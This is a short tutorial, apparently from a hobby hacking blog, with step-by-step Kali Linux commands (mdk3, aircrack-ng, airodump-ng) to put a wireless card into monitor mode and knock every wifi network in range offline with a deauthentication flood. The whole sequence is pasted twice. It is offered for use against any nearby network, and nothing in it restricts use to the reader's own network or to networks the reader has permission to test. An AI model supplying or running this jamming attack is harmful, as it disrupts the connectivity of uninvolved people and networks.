Hey Guys Back Again , today i will show you how you can block every wifi network in your range
using Kali Linux
step 1 ). first of all we need to update our system by this command :
sudo apt update ; sudo apt upgrade
step 2 ). then we have to install a package called mdk3 by this command :
sudo apt install mdk3
Note: If the package is already installed then avoid step 2
step 3 ). now install the aircrack-ng package (if not installed)
sudo apt install aircrack-ng
step 4 ). Now all are set and we are good to go
step 5 ). now we have to put our network card in the monitor mode by this :
sudo airmon-ng check kill
sudo airmon-ng start wlan0 (wlan0 is my wireless card name)
step 6 ). Now we have to scan all the networks near to us by this
sudo airodump-ng wlan0mon
step 7 ). Now its time to put down every network
sudo mdk3 wlan0mon d
DONE
For stopping this attack you have to just press ctrl+c from your keyboard
using Kali Linux
step 1 ). first of all we need to update our system by this command :
sudo apt update ; sudo apt upgrade
step 2 ). then we have to install a package called mdk3 by this command :
sudo apt install mdk3
Note: If the package is already installed then avoid step 2
step 3 ). now install the aircrack-ng package (if not installed)
sudo apt install aircrack-ng
step 4 ). Now all are set and we are good to go
step 5 ). now we have to put our network card in the monitor mode by this :
sudo airmon-ng check kill
sudo airmon-ng start wlan0 (wlan0 is my wireless card name)
step 6 ). Now we have to scan all the networks near to us by this
sudo airodump-ng wlan0mon
step 7 ). Now its time to put down every network
sudo mdk3 wlan0mon d
DONE
For stopping this attack you have to just press ctrl+c from your keyboard